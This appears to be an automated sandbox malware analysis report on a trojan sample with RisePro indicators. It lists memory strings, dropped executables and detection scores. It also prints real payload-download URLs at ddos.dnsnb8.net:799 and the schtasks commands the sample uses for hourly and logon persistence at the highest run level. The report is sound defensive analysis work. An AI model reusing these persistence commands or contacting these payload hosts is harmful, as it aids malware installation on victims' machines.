Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: jHYZko.exe, 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmp, jHYZko.exe, 00000001.00000003.2014334444.0000000001240000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2362229934.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542328869.00000000001E3000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/=
Source: jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=x
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarExh
Source: jHYZko.exe, 00000010.00000003.2369312075.0000000000C58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp
Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarm
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rartC:
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar=x
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarZ
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarfC:
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarL
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarO
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarR
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarpy_
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar(y
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarC:
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarHxg
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarsC:
Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORTz
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_6cbc74d6-1

System Summary

PE file contains section with special chars

Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name: pL~u
Source: RageMP131.exe.0.dr	Static PE information: section name: pL~u
Source: MPGPH131.exe.0.dr	Static PE information: section name: pL~u
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: jHYZko.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

PE file has nameless sections

Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0109991F	0_2_0109991F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01031940	0_2_01031940
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FB2040	0_2_00FB2040
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_010AD1E1	0_2_010AD1E1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0108A800	0_2_0108A800
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FCA100	0_2_00FCA100
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FB22C0	0_2_00FB22C0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FC42A0	0_2_00FC42A0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0103BBB0	0_2_0103BBB0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FBAB50	0_2_00FBAB50
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01034C20	0_2_01034C20
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01090750	0_2_01090750
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01093ED8	0_2_01093ED8
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FBA720	0_2_00FBA720
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_010206F0	0_2_010206F0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA0B23	0_2_7ECA0B23
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA0000	0_2_7ECA0000
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Code function: 1_2_00E66076	1_2_00E66076
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Code function: 1_2_00E66D00	1_2_00E66D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_00572040	7_2_00572040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0064A800	7_2_0064A800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_005F1940	7_2_005F1940
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0058A100	7_2_0058A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0065991F	7_2_0065991F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_005722C0	7_2_005722C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_005842A0	7_2_005842A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0057AB50	7_2_0057AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_005FBBB0	7_2_005FBBB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_005F4C20	7_2_005F4C20
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_005E06F0	7_2_005E06F0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_00653ED8	7_2_00653ED8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_00650750	7_2_00650750
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0057A720	7_2_0057A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_7F220B23	7_2_7F220B23
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_7F220000	7_2_7F220000
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00572040	8_2_00572040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0064A800	8_2_0064A800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_005F1940	8_2_005F1940
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0058A100	8_2_0058A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0065991F	8_2_0065991F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_005722C0	8_2_005722C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_005842A0	8_2_005842A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0057AB50	8_2_0057AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_005FBBB0	8_2_005FBBB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_005F4C20	8_2_005F4C20
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_005E06F0	8_2_005E06F0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00653ED8	8_2_00653ED8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00650750	8_2_00650750
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0057A720	8_2_0057A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_006BC717	8_2_006BC717
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_7F220B23	8_2_7F220B23
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_7F220000	8_2_7F220000

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\jHYZko.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\ProgramData\MPGPH131\MPGPH131.exe

Code function: String function: 0064D940 appears 46 times

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_89.exe
Source: Lisect_AVT_24003_G1A_89.exe	Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_89.exe

Source: Lisect_AVT_24003_G1A_89.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jHYZko.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jHYZko.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jHYZko.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: Section: ZLIB complexity 0.9996907199023861
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: Section: ZLIB complexity 0.9966460129310345
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: Section: ZLIB complexity 0.9948046875
Source: RageMP131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9996907199023861
Source: RageMP131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9966460129310345
Source: RageMP131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9948046875
Source: MPGPH131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9996907199023861
Source: MPGPH131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9966460129310345
Source: MPGPH131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9948046875

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@27/31@1/2

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Code function: 1_2_00E6119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_00E6119F

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Code function: 0_2_00FBAB50 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,

0_2_00FBAB50

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

File created: C:\Users\user\AppData\Local\RageMP131

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6484
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

File created: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

Source: Lisect_AVT_24003_G1A_89.exe	ReversingLabs: Detection: 94%
Source: Lisect_AVT_24003_G1A_89.exe	Virustotal: Detection: 86%

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe"
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: version.dll	Jump to behavior
